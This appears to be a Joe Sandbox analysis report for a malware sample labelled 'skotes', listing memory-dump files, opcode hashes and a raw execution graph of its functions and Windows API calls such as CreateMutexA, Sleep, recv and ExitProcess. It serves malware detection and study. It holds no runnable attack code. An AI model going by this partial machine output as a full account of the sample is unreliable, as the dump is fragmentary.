                                                                                                                                                                                                                              • Associated: 00000002.00000002.1521986282.0000000000ECF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1522013474.0000000000ED7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1522037462.0000000000ED9000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1522063115.0000000000EE6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1522086053.0000000000EE7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_bd0000_skotes.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Xtime_diff_to_millis2_xtime_get
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 531285432-0
                                                                                                                                                                                                                              • Opcode ID: f8543847f07726ee3c49c09d30cecc01f351075ae0b7e82b83cf81ea777003c3
                                                                                                                                                                                                                              • Instruction ID: 74f59ea1929a9731ec60f8544cf756a0ec4062a3451105935b79763ed191b336
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: f8543847f07726ee3c49c09d30cecc01f351075ae0b7e82b83cf81ea777003c3
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: FA2121759001599FDF00EFA5DC81DBFBBB9EF08710F100455F901A7251DB349D069B90

                                                                                                                                                                                                                              Execution Graph

                                                                                                                                                                                                                              Execution Coverage:0.9%
                                                                                                                                                                                                                              Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                              Signature Coverage:0%
                                                                                                                                                                                                                              Total number of Nodes:640
                                                                                                                                                                                                                              Total number of Limit Nodes:4
                                                                                                                                                                                                                              execution_graph 10161 bdcc79 10162 bdcc84 shared_ptr 10161->10162 10163 bdce09 shared_ptr __floor_pentium4 10162->10163 10164 bdce31 10162->10164 10165 bd5c10 3 API calls 10162->10165 10170 bd9030 10162->10170 10167 bd5c10 3 API calls 10164->10167 10165->10162 10168 bdce9d 10167->10168 10174 bdca70 10168->10174 10171 bd907f 10170->10171 10172 bd5c10 3 API calls 10171->10172 10173 bd909a shared_ptr __floor_pentium4 10172->10173 10173->10162 10180 bdcadd 10174->10180 10175 bdce09 shared_ptr __floor_pentium4 10176 bd5c10 3 API calls 10176->10180 10177 bd9030 3 API calls 10177->10180 10178 bdce31 10179 bd5c10 3 API calls 10178->10179 10181 bdce9d 10179->10181 10180->10175 10180->10176 10180->10177 10180->10178 10182 bdca70 3 API calls 10181->10182 10423 c06a44 10424 c06a52 10423->10424 10425 c06a5c 10423->10425 10428 c0698d 10425->10428 10427 c06a76 ___free_lconv_mon 10429 c0690a __cftof 3 API calls 10428->10429 10430 c0699f 10429->10430 10430->10427 10321 bd9ab8 10323 bd9acc 10321->10323 10324 bd9b08 10323->10324 10325 bda917 10324->10325 10326 bd9b4b shared_ptr 10324->10326 10327 bda953 Sleep CreateMutexA 10325->10327 10328 bd5c10 3 API calls 10326->10328 10329 bd9b59 10326->10329 10331 bda98e 10327->10331 10330 bd9b7c 10328->10330 10338 bd8b30 10330->10338 10333 bd9b8d 10334 bd5c10 3 API calls 10333->10334 10335 bd9cb1 10334->10335 10336 bd8b30 3 API calls 10335->10336 10337 bd9cc2 10336->10337 10339 bd8b7c 10338->10339 10340 bd5c10 3 API calls 10339->10340 10342 bd8b97 shared_ptr 10340->10342 10341 bd8d01 shared_ptr __floor_pentium4 10341->10333 10342->10341 10343 bd5c10 3 API calls 10342->10343 10345 bd8d9a shared_ptr 10343->10345 10344 bd8e7e shared_ptr __floor_pentium4 10344->10333 10345->10344 10346 bd5c10 3 API calls 10345->10346 10347 bd8f1a shared_ptr __floor_pentium4 10346->10347 10347->10333 10435 bd4276 10436 bd2410 4 API calls 10435->10436 10437 bd427f 10436->10437 10501 bd5f76 10503 bd5f81 shared_ptr 10501->10503 10502 bd5ffe shared_ptr __floor_pentium4 10503->10502 10504 bd5c10 3 API calls 10503->10504 10505 bd66ac 10504->10505 10506 bd5c10 3 API calls 10505->10506 10507 bd66b1 10506->10507 10508 bd22c0 3 API calls 10507->10508 10509 bd66c9 shared_ptr 10508->10509 10510 bd5c10 3 API calls 10509->10510 10511 bd673d 10510->10511 10512 bd22c0 3 API calls 10511->10512 10514 bd6757 shared_ptr 10512->10514 10513 bd5c10 3 API calls 10513->10514 10514->10513 10515 bd22c0 3 API calls 10514->10515 10516 bd6852 shared_ptr __floor_pentium4 10514->10516 10515->10514 10227 bd55f0 10228 bd5610 10227->10228 10229 bd22c0 3 API calls 10228->10229 10230 bd5710 __floor_pentium4 10228->10230 10229->10228 10298 bd2170 10301 bec6fc 10298->10301 10300 bd217a 10302 bec70c 10301->10302 10303 bec724 10301->10303 10302->10303 10305 becfbe 10302->10305 10303->10300 10306 beccd5 __Mtx_init_in_situ InitializeCriticalSectionEx 10305->10306 10307 becfd0 10306->10307 10307->10302 10308 bd3970 10309 bec68b __Mtx_init_in_situ 2 API calls 10308->10309 10310 bd39a7 10309->10310 10311 bec68b __Mtx_init_in_situ 2 API calls 10310->10311 10312 bd39e6 10311->10312 10348 bd42b0 10351 bd3ac0 10348->10351 10350 bd42bb shared_ptr 10352 bd3af9 10351->10352 10353 bd32d0 5 API calls 10352->10353 10355 bd3c38 10352->10355 10356 bd3b39 __Cnd_destroy_in_situ shared_ptr __Mtx_destroy_in_situ 10352->10356 10353->10355 10354 bd32d0 5 API calls 10358 bd3c5f 10354->10358 10355->10354 10355->10358 10356->10350 10357 bd3c68 10357->10350 10358->10357 10359 bd3810 3 API calls 10358->10359 10360 bd3cdb 10359->10360 10452 bd43f0 10453 bebedf InitOnceExecuteOnce 10452->10453 10454 bd440a 10453->10454 10455 bd4411 10454->10455 10456 c06cbb 3 API calls 10454->10456 10457 bd4424 10456->10457 9724 bd5cad 9726 bd5caf shared_ptr __cftof 9724->9726 9725 bd5d17 shared_ptr __floor_pentium4 9726->9725 9727 bd5c10 3 API calls 9726->9727 9728 bd66ac 9727->9728 9740 bd5c10 9728->9740 9730 bd66b1 9758 bd22c0 9730->9758 9732 bd66c9 shared_ptr 9733 bd5c10 3 API calls 9732->9733 9734 bd673d 9733->9734 9735 bd22c0 3 API calls 9734->9735 9737 bd6757 shared_ptr 9735->9737 9736 bd5c10 3 API calls 9736->9737 9737->9736 9738 bd22c0 3 API calls 9737->9738 9739 bd6852 shared_ptr __floor_pentium4 9737->9739 9738->9737 9741 bd5c54 9740->9741 9761 bd4b30 9741->9761 9743 bd5d17 shared_ptr __floor_pentium4 9743->9730 9744 bd5c7b shared_ptr __cftof 9744->9743 9745 bd5c10 3 API calls 9744->9745 9746 bd66ac 9745->9746 9747 bd5c10 3 API calls 9746->9747 9748 bd66b1 9747->9748 9749 bd22c0 3 API calls 9748->9749 9750 bd66c9 shared_ptr 9749->9750 9751 bd5c10 3 API calls 9750->9751 9752 bd673d 9751->9752 9753 bd22c0 3 API calls 9752->9753 9755 bd6757 shared_ptr 9753->9755 9754 bd5c10 3 API calls 9754->9755 9755->9754 9756 bd22c0 3 API calls 9755->9756 9757 bd6852 shared_ptr __floor_pentium4 9755->9757 9756->9755 9757->9730 9882 bd2280 9758->9882 9763 bd4ce5 9761->9763 9764 bd4b92 9761->9764 9763->9744 9764->9763 9765 c06da6 9764->9765 9766 c06db4 9765->9766 9768 c06dc2 9765->9768 9770 c06d19 9766->9770 9768->9764 9775 c0690a 9770->9775 9774 c06d3d 9774->9764 9776 c0692a 9775->9776 9782 c06921 9775->9782 9776->9782 9789 c0a671 9776->9789 9783 c06d52 9782->9783 9784 c06d8f 9783->9784 9786 c06d5f 9783->9786 9874 c0b67d 9784->9874 9787 c06d6e 9786->9787 9869 c0b6a1 9786->9869 9787->9774 9793 c0a67b __dosmaperr ___free_lconv_mon 9789->9793 9790 c0694a 9794 c0b5fb 9790->9794 9793->9790 9802 c08bec 9793->9802 9795 c06960 9794->9795 9796 c0b60e 9794->9796 9798 c0b628 9795->9798 9796->9795 9828 c0f5ab 9796->9828 9799 c0b63b 9798->9799 9801 c0b650 9798->9801 9799->9801 9835 c0e6b1 9799->9835 9801->9782 9803 c08bf1 __cftof 9802->9803 9807 c08bfc __cftof 9803->9807 9808 c0d634 9803->9808 9822 c065ed 9807->9822 9810 c0d640 __cftof __dosmaperr 9808->9810 9809 c0d69c __cftof __dosmaperr 9809->9807 9810->9809 9811 c0d726 9810->9811 9812 c0d81b __cftof 9810->9812 9814 c0d751 __cftof 9810->9814 9811->9814 9825 c0d62b 9811->9825 9813 c065ed __cftof 3 API calls 9812->9813 9816 c0d82e 9813->9816 9814->9809 9818 c0a671 __cftof 3 API calls 9814->9818 9820 c0d7a5 9814->9820 9818->9820 9819 c0d62b __cftof 3 API calls 9819->9814 9820->9809 9821 c0a671 __cftof 3 API calls 9820->9821 9821->9809 9823 c064c7 __cftof 3 API calls 9822->9823 9824 c065fe 9823->9824 9826 c0a671 __cftof 3 API calls 9825->9826 9827 c0d630 9826->9827 9827->9819 9829 c0f5b7 __dosmaperr 9828->9829 9830 c0a671 __cftof 3 API calls 9829->9830 9832 c0f5c0 __cftof __dosmaperr 9830->9832 9831 c0f606 9831->9795 9832->9831 9833 c08bec __cftof 3 API calls 9832->9833 9834 c0f62b 9833->9834 9836 c0a671 __cftof 3 API calls 9835->9836 9837 c0e6bb 9836->9837 9840 c0e5c9 9837->9840 9839 c0e6c1 9839->9801 9844 c0e5d5 __cftof __dosmaperr ___free_lconv_mon 9840->9844 9841 c0e5f6 9841->9839 9842 c08bec __cftof 3 API calls 9843 c0e668 9842->9843 9848 c0e6a4 9843->9848 9849 c0a72e 9843->9849 9844->9841 9844->9842 9848->9839 9850 c0a739 __dosmaperr ___free_lconv_mon 9849->9850 9851 c08bec __cftof 3 API calls 9850->9851 9853 c0a7be 9850->9853 9852 c0a7c7 9851->9852 9854 c0e4b0 9853->9854 9855 c0e5c9 __cftof 3 API calls 9854->9855 9856 c0e4c3 9855->9856 9861 c0e259 9856->9861 9858 c0e4cb __cftof 9860 c0e4dc __cftof __dosmaperr ___free_lconv_mon 9858->9860 9864 c0e6c4 9858->9864 9860->9848 9862 c0690a __cftof GetPEB ExitProcess GetPEB 9861->9862 9863 c0e26b 9862->9863 9863->9858 9865 c0e259 __cftof GetPEB ExitProcess GetPEB 9864->9865 9866 c0e6e4 __cftof 9865->9866 9867 c0e75a __cftof __floor_pentium4 9866->9867 9868 c0e32f __cftof GetPEB ExitProcess GetPEB 9866->9868 9867->9860 9868->9867 9870 c0690a __cftof 3 API calls 9869->9870 9871 c0b6be 9870->9871 9873 c0b6ce __floor_pentium4 9871->9873 9879 c0f1bf 9871->9879 9873->9787 9875 c0a671 __cftof 3 API calls 9874->9875 9876 c0b688 9875->9876 9877 c0b5fb __cftof 3 API calls 9876->9877 9878 c0b698 9877->9878 9878->9787 9880 c0690a __cftof 3 API calls 9879->9880 9881 c0f1df __cftof __freea __floor_pentium4 9880->9881 9881->9873 9883 bd2296 9882->9883 9886 c087f8 9883->9886 9889 c07609 9886->9889 9888 bd22a4 9888->9732 9890 c07649 9889->9890 9894 c07631 __cftof __dosmaperr __floor_pentium4 9889->9894 9891 c0690a __cftof 3 API calls 9890->9891 9890->9894 9892 c07661 9891->9892 9895 c07bc4 9892->9895 9894->9888 9897 c07bd5 9895->9897 9896 c07be4 __cftof __dosmaperr 9896->9894 9897->9896 9902 c08168 9897->9902 9907 c07dc2 9897->9907 9912 c07de8 9897->9912 9922 c07f36 9897->9922 9903 c08171 9902->9903 9904 c08178 9902->9904 9931 c07b50 9903->9931 9904->9897 9906 c08177 9906->9897 9908 c07dcb 9907->9908 9910 c07dd2 9907->9910 9909 c07b50 3 API calls 9908->9909 9911 c07dd1 9909->9911 9910->9897 9911->9897 9913 c07e09 __cftof __dosmaperr 9912->9913 9914 c07def 9912->9914 9913->9897 9914->9913 9915 c07f69 9914->9915 9917 c07fa2 9914->9917 9921 c07f77 9914->9921 9918 c07f8b 9915->9918 9915->9921 9949 c08241 9915->9949 9917->9918 9945 c08390 9917->9945 9918->9897 9921->9918 9953 c086ea 9921->9953 9923 c07f4f 9922->9923 9924 c07f69 9922->9924 9923->9924 9925 c07fa2 9923->9925 9929 c07f77 9923->9929 9926 c07f8b 9924->9926 9927 c08241 3 API calls 9924->9927 9924->9929 9925->9926 9928 c08390 3 API calls 9925->9928 9926->9897 9927->9929 9928->9929 9929->9926 9930 c086ea 3 API calls 9929->9930 9930->9926 9932 c07b62 __dosmaperr 9931->9932 9935 c08ab6 9932->9935 9934 c07b85 __dosmaperr 9934->9906 9936 c08ad1 9935->9936 9939 c08868 9936->9939 9938 c08adb 9938->9934 9940 c0887a 9939->9940 9941 c0690a __cftof 3 API calls 9940->9941 9944 c0888f __cftof __dosmaperr 9940->9944 9943 c088bf 9941->9943 9942 c06d52 3 API calls 9942->9943 9943->9942 9943->9944 9944->9938 9946 c083ab 9945->9946 9947 c083dd 9946->9947 9957 c0c88e 9946->9957 9947->9921 9950 c0825a 9949->9950 9964 c0d3c8 9950->9964 9952 c0830d 9952->9921 9954 c0875d __floor_pentium4 9953->9954 9956 c08707 9953->9956 9954->9918 9955 c0c88e __cftof 3 API calls 9955->9956 9956->9954 9956->9955 9960 c0c733 9957->9960 9959 c0c8a6 9959->9947 9961 c0c743 9960->9961 9962 c0690a __cftof 3 API calls 9961->9962 9963 c0c748 __cftof __dosmaperr 9961->9963 9962->9963 9963->9959 9966 c0d3ee 9964->9966 9976 c0d3d8 __cftof __dosmaperr 9964->9976 9965 c0d485 9969 c0d4e4 9965->9969 9970 c0d4ae 9965->9970 9966->9965 9967 c0d48a 9966->9967 9966->9976 9977 c0cbdf 9967->9977 9994 c0cef8 9969->9994 9971 c0d4b3 9970->9971 9972 c0d4cc 9970->9972 9983 c0d23e 9971->9983 9990 c0d0e2 9972->9990 9976->9952 9978 c0cbf1 9977->9978 9979 c0690a __cftof 3 API calls 9978->9979 9980 c0cc05 9979->9980 9981 c0cef8 3 API calls 9980->9981 9982 c0cc0d __alldvrm __cftof __dosmaperr _strrchr 9980->9982 9981->9982 9982->9976 9984 c0d26c 9983->9984 9985 c0d2de 9984->9985 9987 c0d2b7 9984->9987 9989 c0d2a5 9984->9989 10001 c0cf9a 9985->10001 9998 c0d16d 9987->9998 9989->9976 9991 c0d10f 9990->9991 9992 c0d14e 9991->9992 9993 c0d16d 3 API calls 9991->9993 9992->9976 9993->9992 9995 c0cf10 9994->9995 9996 c0cf75 9995->9996 9997 c0cf9a 3 API calls 9995->9997 9996->9976 9997->9996 9999 c0690a __cftof GetPEB ExitProcess GetPEB 9998->9999 10000 c0d183 __cftof 9999->10000 10000->9989 10002 c0cfab 10001->10002 10003 c0690a __cftof GetPEB ExitProcess GetPEB 10002->10003 10004 c0cfb9 __cftof __dosmaperr 10002->10004 10005 c0cfda __cftof ___std_exception_copy 10003->10005 10004->9989 10438 bd9ba5 10439 bd9ba7 10438->10439 10440 bd5c10 3 API calls 10439->10440 10441 bd9cb1 10440->10441 10442 bd8b30 3 API calls 10441->10442 10443 bd9cc2 10442->10443 10006 bd20a0 10009 bec68b 10006->10009 10008 bd20ac 10012 bec3d5 10009->10012 10011 bec69b 10011->10008 10013 bec3eb 10012->10013 10014 bec3e1 10012->10014 10013->10011 10015 bec39e 10014->10015 10016 bec3be 10014->10016 10015->10013 10021 beccd5 10015->10021 10025 becd0a 10016->10025 10019 bec3d0 10019->10011 10022 becce3 InitializeCriticalSectionEx 10021->10022 10024 bec3b7 10021->10024 10022->10024 10024->10011 10026 becd1f RtlInitializeConditionVariable 10025->10026 10026->10019 10250 bd4120 10251 bd416a 10250->10251 10253 bd41b2 Concurrency::details::_ContextCallback::_CallInContext __floor_pentium4 10251->10253 10254 bd3ee0 10251->10254 10255 bd3f1e 10254->10255 10256 bd3f48 10254->10256 10255->10253 10257 bd3f58 10256->10257 10260 bd2c00 10256->10260 10257->10253 10261 bd2c0e 10260->10261 10267 beb847 10261->10267 10263 bd2c42 10264 bd2c49 10263->10264 10273 bd2c80 10263->10273 10264->10253 10266 bd2c58 std::_Throw_future_error 10268 beb854 10267->10268 10272 beb873 Concurrency::details::_Reschedule_chore 10267->10272 10276 becb77 10268->10276 10270 beb864 10270->10272 10278 beb81e 10270->10278 10272->10263 10284 beb7fb 10273->10284 10275 bd2cb2 shared_ptr 10275->10266 10277 becb92 CreateThreadpoolWork 10276->10277 10277->10270 10279 beb827 Concurrency::details::_Reschedule_chore 10278->10279 10282 becdcc 10279->10282 10281 beb841 10281->10272 10283 becde1 TpPostWork 10282->10283 10283->10281 10285 beb817 10284->10285 10286 beb807 10284->10286 10285->10275 10286->10285 10288 beca78 10286->10288 10289 beca8d TpReleaseWork 10288->10289 10289->10285 10458 bd3fe0 10459 bd4022 10458->10459 10460 bd408c 10459->10460 10461 bd40d2 10459->10461 10464 bd4035 __floor_pentium4 10459->10464 10465 bd35e0 10460->10465 10462 bd3ee0 3 API calls 10461->10462 10462->10464 10466 bd3616 10465->10466 10470 bd364e Concurrency::cancel_current_task shared_ptr __floor_pentium4 10466->10470 10471 bd2ce0 10466->10471 10468 bd369e 10469 bd2c00 3 API calls 10468->10469 10468->10470 10469->10470 10470->10464 10472 bd2d1d 10471->10472 10473 bebedf InitOnceExecuteOnce 10472->10473 10474 bd2d46 10473->10474 10475 bd2d51 __floor_pentium4 10474->10475 10476 bd2d88 10474->10476 10480 bebef7 10474->10480 10475->10468 10478 bd2440 3 API calls 10476->10478 10479 bd2d9b 10478->10479 10479->10468 10481 bebf03 std::_Throw_future_error 10480->10481 10482 bebf6a 10481->10482 10483 bebf73 10481->10483 10487 bebe7f 10482->10487 10484 bd2ae0 4 API calls 10483->10484 10486 bebf6f 10484->10486 10486->10476 10488 becc31 InitOnceExecuteOnce 10487->10488 10489 bebe97 10488->10489 10490 bebe9e 10489->10490 10491 c06cbb 3 API calls 10489->10491 10490->10486 10492 bebea7 10491->10492 10492->10486 10370 bd9adc 10373 bd9aea shared_ptr 10370->10373 10371 bda917 10372 bda953 Sleep CreateMutexA 10371->10372 10374 bda98e 10372->10374 10373->10371 10375 bd9b4b shared_ptr 10373->10375 10376 bd5c10 3 API calls 10375->10376 10377 bd9b59 10375->10377 10378 bd9b7c 10376->10378 10379 bd8b30 3 API calls 10378->10379 10380 bd9b8d 10379->10380 10381 bd5c10 3 API calls 10380->10381 10382 bd9cb1 10381->10382 10383 bd8b30 3 API calls 10382->10383 10384 bd9cc2 10383->10384 10444 bd3f9f 10445 bd3fad 10444->10445 10446 bd3fb6 10444->10446 10447 bd2410 4 API calls 10445->10447 10447->10446 10313 bd215a 10314 bec6fc InitializeCriticalSectionEx 10313->10314 10315 bd2164 10314->10315 9703 c06629 9706 c064c7 9703->9706 9707 c064d5 __cftof 9706->9707 9708 c06520 9707->9708 9711 c0652b 9707->9711 9710 c0652a 9717 c0a302 GetPEB 9711->9717 9713 c06535 9714 c0654a __cftof 9713->9714 9715 c0653a GetPEB 9713->9715 9716 c06562 ExitProcess 9714->9716 9715->9714 9718 c0a31c __cftof 9717->9718 9718->9713 9719 bda856 9720 bda870 9719->9720 9721 bda892 shared_ptr 9719->9721 9720->9721 9722 bda953 Sleep CreateMutexA 9720->9722 9723 bda98e 9722->9723 10448 bd2b90 10449 bd2bce 10448->10449 10450 beb7fb TpReleaseWork 10449->10450 10451 bd2bdb shared_ptr __floor_pentium4 10450->10451 10496 bd2b10 10497 bd2b1c 10496->10497 10498 bd2b1a 10496->10498 10499 bec26a 4 API calls 10497->10499 10500 bd2b22 10499->10500 10290 bed111 10292 bed121 10290->10292 10291 bed12a 10292->10291 10294 bed199 10292->10294 10295 bed1a7 SleepConditionVariableCS 10294->10295 10297 bed1c0 10294->10297 10295->10297 10297->10292 10027 bd3c8e 10028 bd3c98 10027->10028 10030 bd3ca5 10028->10030 10035 bd2410 10028->10035 10031 bd3ccf 10030->10031 10039 bd3810 10030->10039 10033 bd3810 3 API calls 10031->10033 10034 bd3cdb 10033->10034 10036 bd2424 10035->10036 10043 beb52d 10036->10043 10040 bd381c 10039->10040 10092 bd2440 10040->10092 10051 c03aed 10043->10051 10045 bd242a 10045->10030 10046 beb5a5 ___std_exception_copy 10058 beb1ad 10046->10058 10047 beb598 10054 beaf56 10047->10054 10062 c04f29 10051->10062 10053 beb555 10053->10045 10053->10046 10053->10047 10055 beaf9f ___std_exception_copy 10054->10055 10057 beafb2 shared_ptr 10055->10057 10068 beb39f 10055->10068 10057->10045 10059 beb1d8 10058->10059 10061 beb1e1 shared_ptr 10058->10061 10060 beb39f 4 API calls 10059->10060 10060->10061 10061->10045 10063 c04f2e __cftof 10062->10063 10063->10053 10064 c0d634 __cftof 3 API calls 10063->10064 10067 c08bfc __cftof 10063->10067 10064->10067 10065 c065ed __cftof 3 API calls 10066 c08c2f 10065->10066 10067->10065 10079 bebedf 10068->10079 10071 beb3e8 10071->10057 10088 becc31 10079->10088 10082 c06cbb 10083 c06cc7 __dosmaperr 10082->10083 10084 c0a671 __cftof 3 API calls 10083->10084 10087 c06ccc 10084->10087 10085 c08bec __cftof 3 API calls 10086 c06cf6 10085->10086 10087->10085 10089 becc3f InitOnceExecuteOnce 10088->10089 10091 beb3e1 10088->10091 10089->10091 10091->10071 10091->10082 10095 beb5d6 10092->10095 10094 bd2472 10096 beb5f1 std::_Throw_future_error 10095->10096 10097 c08bec __cftof 3 API calls 10096->10097 10099 beb658 __cftof __floor_pentium4 10096->10099 10098 beb69f 10097->10098 10099->10094 10100 bed0c7 10101 bed0d7 10100->10101 10102 bed17f 10101->10102 10103 bed17b RtlWakeAllConditionVariable 10101->10103 10522 bd9f44 10523 bd9f4c shared_ptr 10522->10523 10524 bda953 Sleep CreateMutexA 10523->10524 10525 bda01f shared_ptr 10523->10525 10526 bda98e 10524->10526 10183 bd3c47 10184 bd3c51 10183->10184 10187 bd3c5f 10184->10187 10190 bd32d0 10184->10190 10185 bd3c68 10187->10185 10188 bd3810 3 API calls 10187->10188 10189 bd3cdb 10188->10189 10191 bec6ac GetSystemTimePreciseAsFileTime 10190->10191 10199 bd3314 10191->10199 10192 bd336b 10193 bec26a 4 API calls 10192->10193 10194 bd333c __Mtx_unlock 10193->10194 10196 bec26a 4 API calls 10194->10196 10197 bd3350 __floor_pentium4 10194->10197 10198 bd3377 10196->10198 10197->10187 10200 bec6ac GetSystemTimePreciseAsFileTime 10198->10200 10199->10192 10199->10194 10209 bebd4c 10199->10209 10201 bd33af 10200->10201 10202 bec26a 4 API calls 10201->10202 10203 bd33b6 __Cnd_broadcast 10201->10203 10202->10203 10204 bec26a 4 API calls 10203->10204 10205 bd33d7 __Mtx_unlock 10203->10205 10204->10205 10206 bec26a 4 API calls 10205->10206 10207 bd33eb 10205->10207 10208 bd340e 10206->10208 10207->10187 10208->10187 10212 bebb72 10209->10212 10211 bebd5c 10211->10199 10213 bebb9c 10212->10213 10214 becf6b _xtime_get GetSystemTimePreciseAsFileTime 10213->10214 10215 bebba4 __Xtime_diff_to_millis2 __floor_pentium4 10213->10215 10216 bebbcf __Xtime_diff_to_millis2 10214->10216 10215->10211 10216->10215 10217 becf6b _xtime_get GetSystemTimePreciseAsFileTime 10216->10217 10217->10215 10104 bd20c0 10105 bec68b __Mtx_init_in_situ 2 API calls 10104->10105 10106 bd20cc 10105->10106 10107 bde0c0 recv 10108 bde122 recv 10107->10108 10109 bde157 recv 10108->10109 10110 bde191 10109->10110 10111 bde2b3 __floor_pentium4 10110->10111 10116 bec6ac 10110->10116 10123 bec452 10116->10123 10118 bde2ee 10119 bec26a 10118->10119 10120 bec292 10119->10120 10121 bec274 10119->10121 10120->10120 10121->10120 10140 bec297 10121->10140 10124 bec4a8 10123->10124 10125 bec47a __floor_pentium4 10123->10125 10124->10125 10129 becf6b 10124->10129 10125->10118 10127 bec4fd __Xtime_diff_to_millis2 10127->10125 10128 becf6b _xtime_get GetSystemTimePreciseAsFileTime 10127->10128 10128->10127 10130 becf87 __aulldvrm 10129->10130 10131 becf7a 10129->10131 10130->10127 10131->10130 10133 becf44 10131->10133 10136 becbea 10133->10136 10137 becbfb GetSystemTimePreciseAsFileTime 10136->10137 10138 becc07 10136->10138 10137->10138 10138->10130 10143 bd2ae0 10140->10143 10142 bec2ae std::_Throw_future_error 10144 bebedf InitOnceExecuteOnce 10143->10144 10146 bd2af4 __dosmaperr 10144->10146 10145 bd2aff 10145->10142 10146->10145 10147 c0a671 __cftof 3 API calls 10146->10147 10149 c06ccc 10147->10149 10148 c08bec __cftof 3 API calls 10150 c06cf6 10148->10150 10149->10148 10223 bd8980 10225 bd8aea 10223->10225 10226 bd89d8 shared_ptr 10223->10226 10224 bd5c10 3 API calls 10224->10226 10226->10224 10226->10225 10385 bd2ec0 10386 bd2f7e GetCurrentThreadId 10385->10386 10387 bd2f06 10385->10387 10390 bd2f94 10386->10390 10405 bd2fef 10386->10405 10388 bec6ac GetSystemTimePreciseAsFileTime 10387->10388 10389 bd2f12 10388->10389 10391 bd301e 10389->10391 10397 bd2f1d __Mtx_unlock 10389->10397 10394 bec6ac GetSystemTimePreciseAsFileTime 10390->10394 10390->10405 10392 bec26a 4 API calls 10391->10392 10393 bd3024 10392->10393 10395 bec26a 4 API calls 10393->10395 10396 bd2fb9 10394->10396 10395->10396 10399 bec26a 4 API calls 10396->10399 10400 bd2fc0 __Mtx_unlock 10396->10400 10397->10393 10398 bd2f6f 10397->10398 10398->10386 10398->10405 10399->10400 10401 bec26a 4 API calls 10400->10401 10402 bd2fd8 __Cnd_broadcast 10400->10402 10401->10402 10403 bec26a 4 API calls 10402->10403 10402->10405 10404 bd303c 10403->10404 10406 bec6ac GetSystemTimePreciseAsFileTime 10404->10406 10414 bd3080 shared_ptr __Mtx_unlock 10406->10414 10407 bd31c5 10408 bec26a 4 API calls 10407->10408 10409 bd31cb 10408->10409 10410 bec26a 4 API calls 10409->10410 10411 bd31d1 10410->10411 10412 bec26a 4 API calls 10411->10412 10420 bd3193 __Mtx_unlock 10412->10420 10413 bd31a7 __floor_pentium4 10414->10407 10414->10409 10414->10413 10416 bd3132 GetCurrentThreadId 10414->10416 10415 bec26a 4 API calls 10417 bd31dd 10415->10417 10416->10413 10418 bd313b 10416->10418 10418->10413 10419 bec6ac GetSystemTimePreciseAsFileTime 10418->10419 10421 bd315f 10419->10421 10420->10413 10420->10415 10421->10407 10421->10411 10421->10420 10422 bebd4c GetSystemTimePreciseAsFileTime 10421->10422 10422->10421 10431 bd2e00 10432 bd2e28 10431->10432 10433 bec68b __Mtx_init_in_situ 2 API calls 10432->10433 10434 bd2e33 10433->10434 10493 c08bbe 10494 c08868 3 API calls 10493->10494 10495 c08bdc 10494->10495

                                                                                                                                                                                                                              Executed Functions

                                                                                                                                                                                                                              Function 00C0652B Relevance: 1.5, APIs: 1, Instructions: 24COMMONLIBRARYCODE
                                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                              control_flow_graph 351 c0652b-c06538 call c0a302 354 c0655a-c0656c call c0656d ExitProcess 351->354 355 c0653a-c06548 GetPEB 351->355 355->354 356 c0654a-c06559 355->356 356->354
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • ExitProcess.KERNEL32(?,?,00C0652A,?,?,?,?,?,00C07661), ref: 00C06567
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000003.00000002.1522880580.0000000000BD1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00BD0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1522706879.0000000000BD0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1522880580.0000000000C32000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1523628636.0000000000C39000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1523663771.0000000000C3B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1524170738.0000000000C47000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1525599737.0000000000DA6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1525653205.0000000000DA8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1526635603.0000000000DC2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1526668570.0000000000DC4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1526710461.0000000000DC6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1526710461.0000000000DD0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1526945746.0000000000DD4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1527000689.0000000000DD7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1527088914.0000000000DD8000.00000080.00000001.01000000.00000007.sdmpDownload File
